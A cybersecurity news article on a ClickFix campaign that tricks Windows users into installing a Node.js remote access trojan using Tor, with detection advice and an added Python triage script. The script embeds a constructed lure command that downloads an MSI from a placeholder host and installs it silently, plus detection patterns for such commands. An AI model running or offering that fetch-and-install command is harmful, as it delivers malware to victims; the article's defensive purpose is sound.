Hackers News

Threats

ClickFix Lure Drops Node.js Windows RAT with Tor

Sarah Simpson, April 7, 2026

A new wave of cyberattacks is targeting Windows users, deploying a Node.js-based Remote Access Trojan (RAT) through a social engineering technique dubbed ClickFix. Attackers trick victims with a fake browser verification page, coercing them into executing a hidden command that quietly installs the RAT onto their systems.

The malware then communicates with its operators through the Tor network, masking its traffic and making the attacker’s infrastructure nearly impossible to trace or shut down.

ClickFix gained prominence as a delivery method in early 2025, when threat actors used it to push well-known malware families such as LegionLoader and LummaStealer onto victim machines.

The technique works by displaying a fake CAPTCHA or identity check page whose script silently places a command on the clipboard, then instructing the user to paste and run it themselves, typically through the Windows Run dialog (Win+R) or a terminal. No exploit is involved: the victim launches the first stage by hand.

In this latest campaign, that command executes a base64-encoded PowerShell script that downloads a malicious installer file, NodeServer-Setup-Full.msi, from a fraudulent domain and installs it silently in the background without displaying any visible prompts.

Researchers at Netskope Threat Labs identified and tracked this campaign, noting that it stands clearly apart from earlier ClickFix operations due to its more sophisticated overall design.

The RAT is built on a modular Node.js framework, meaning its most dangerous capabilities are never stored on the victim’s hard drive. They are delivered entirely in memory only after the malware establishes a successful connection to its command-and-control server, which lets it evade file-based antivirus scanning with relative ease.

What makes this campaign particularly alarming is the criminal infrastructure supporting it. The attackers built a Malware-as-a-Service platform that multiple operators can access and deploy against their own sets of victims.

An operational security mistake by the threat actors accidentally exposed the server-side admin panel, which revealed features for tracking cryptocurrency wallets, managing multiple operators with role-based access controls, pushing custom modules to infected machines, and sending real-time Telegram alerts whenever a new victim connects.

The malware also builds a thorough profile of each compromised machine, collecting the operating system version, hardware details, geographic location, external IP address, and a full list of security tools currently running on the system. This fingerprinting step helps operators decide which victims are worth pursuing further.

The malware actively checks for more than 30 antivirus and endpoint security products, including CrowdStrike, Kaspersky, SentinelOne, and Windows Defender.

How the Infection Persists and Communicates

Once the MSI installer runs, the malware extracts its files into the %LOCALAPPDATA%\LogicOptimizer folder and registers a persistence entry under a Windows Registry Run key, so it starts automatically each time the user logs in.

It launches Node.js through conhost.exe with the --headless switch, so no console window is created and nothing appears in the taskbar that could raise suspicion and reveal the infection.

Before connecting to its C2 server, the malware runs through multiple layers of decryption using AES-256-CBC and XOR methods to uncover its full configuration data.

The key material is also reshuffled on every execution, which hampers recovery of the configuration by static analysis alone. Once decrypted, the configuration reveals a .onion Tor hidden service address as the C2 server destination.

To reach that server, the malware downloads the Tor Expert Bundle directly from the official Tor Project website and creates a SOCKS5 proxy on the local machine.

It then connects over gRPC, an RPC framework that runs on HTTP/2 and whose bidirectional streams give the infected machine and the C2 operator a real-time two-way channel through the local Tor SOCKS5 proxy.

All theft modules and commands are pushed from the server as JavaScript strings, executed in a Node.js sandbox in memory, and never written to disk. A built-in watchdog process monitors the connection and automatically restarts it if it drops.

Security teams should monitor endpoints for unexpected node.exe processes, especially ones launched via conhost.exe --headless or running from under %LOCALAPPDATA%, for Tor traffic on the network, and for any new entries added under Registry Run keys.

Organizations should also alert on or block Tor usage on corporate endpoints, and flag any MSI file that PowerShell downloads and hands to msiexec for a silent install. Note that a .onion address never appears in ordinary DNS traffic: the RAT resolves it through the Tor client it fetches from the Tor Project site, so the observable network indicators are that download and the subsequent connections to Tor relays, not a lookup for the .onion name itself.
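As an added example (not code from Netskope Threat Labs or from this article), the following Python applies the detection guidance above to constructed Sysmon-style events. It decodes a PowerShell -EncodedCommand argument to expose the silent msiexec install described in the lure stage, flags node.exe launched under conhost.exe --headless, and flags Run-key values pointing into %LOCALAPPDATA%. The domain, user name and the script names inside the LogicOptimizer folder are placeholders; the MSI file name and the folder name come from the article.

```python
"""Triage helpers for the ClickFix -> Node.js RAT chain discussed in this article.

Added example, not Netskope's or the article's code. The telemetry below is
constructed in a Sysmon-like shape (EventID 1 = process creation, 13 = registry
value set). Hostnames, user names and file names inside LogicOptimizer are
placeholders.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the forms
# commonly seen in ClickFix lures are covered here.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
URL = re.compile(r"""https?://[^\s'"`;]+""", re.I)
SILENT_MSI = re.compile(r"msiexec(?:\.exe)?\b.*?/(?:qn|quiet|q\b)", re.I | re.S)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process(ev: dict) -> list:
    """Flag the lure stage (encoded PowerShell -> silent MSI) and the
    headless-conhost launch of node.exe described in the article."""
    findings = []
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    parent = ev.get("ParentCommandLine", "").lower()
    if image.endswith(("powershell.exe", "pwsh.exe")):
        script = decode_encoded_command(cmd)
        if script and SILENT_MSI.search(script):
            msi_urls = [u for u in URL.findall(script) if u.lower().endswith(".msi")]
            findings.append(("silent_msi_via_encoded_powershell", msi_urls))
    if image.endswith("node.exe") and "conhost" in parent and "--headless" in parent:
        findings.append(("headless_conhost_launching_node", [cmd]))
    return findings


def analyze_registry(ev: dict) -> list:
    """Flag Run-key persistence whose value points into %LOCALAPPDATA%."""
    target = ev.get("TargetObject", "")
    value = ev.get("Details", "")
    if re.search(r"\\CurrentVersion\\Run\\", target, re.I) and re.search(
        r"%LOCALAPPDATA%|\\AppData\\Local\\", value, re.I
    ):
        return [("run_key_into_localappdata", [target, value])]
    return []


def triage(events: list) -> list:
    """Route each event to its analyzer; returns (event_id, finding, evidence)."""
    out = []
    for ev in events:
        fn = analyze_process if ev["EventID"] == 1 else analyze_registry
        for name, evidence in fn(ev):
            out.append((ev["id"], name, evidence))
    return out


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand payload the way the lure page's script would."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed lure script: fetch the MSI named in the article from a
# placeholder domain and install it silently (/qn = no UI).
LURE_SCRIPT = (
    '$p="$env:TEMP\\NodeServer-Setup-Full.msi";'
    "iwr https://update-check.example/NodeServer-Setup-Full.msi -OutFile $p;"
    "msiexec /i $p /qn"
)
SAMPLE_EVENTS = [
    {"id": "benign", "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"id": "lure", "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc " + _encode_ps(LURE_SCRIPT),
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"id": "rat", "EventID": 1, "Image": r"C:\Users\alice\AppData\Local\LogicOptimizer\node.exe",
     "CommandLine": r"node.exe C:\Users\alice\AppData\Local\LogicOptimizer\main.js",  # main.js is a placeholder
     "ParentCommandLine": r"C:\Windows\System32\conhost.exe --headless node.exe"},
    {"id": "persist", "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\LogicOptimizer",
     "Details": r"C:\Users\alice\AppData\Local\LogicOptimizer\start.cmd"},  # start.cmd is a placeholder
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Decoding the encoded command is the step that matters most: the outer command line of a ClickFix lure usually looks like any other `powershell -enc` invocation, and only the decoded UTF-16LE script shows the download URL and the silent msiexec switch. The conhost.exe check is deliberately narrow (node.exe with a `--headless` conhost parent) because conhost.exe itself is ubiquitous on Windows and would be noise on its own.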

User awareness training remains critical, as ClickFix attacks rely entirely on tricking individuals into running commands they do not understand.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

About the author
Sarah is a cybersecurity journalist specializing in threat intelligence and malware analysis. With over 8 years of experience covering APT groups, zero-day exploits, and advanced persistent threats, Sarah brings deep technical expertise to breaking cybersecurity news. Previously, she worked as a security researcher at leading threat intelligence firms, where she analyzed malware samples and tracked cybercriminal operations. Sarah holds a Master's degree in Computer Science with a focus on cybersecurity and is a regular contributor to major security conferences.

All Rights Reserved by HackersRadar ©2026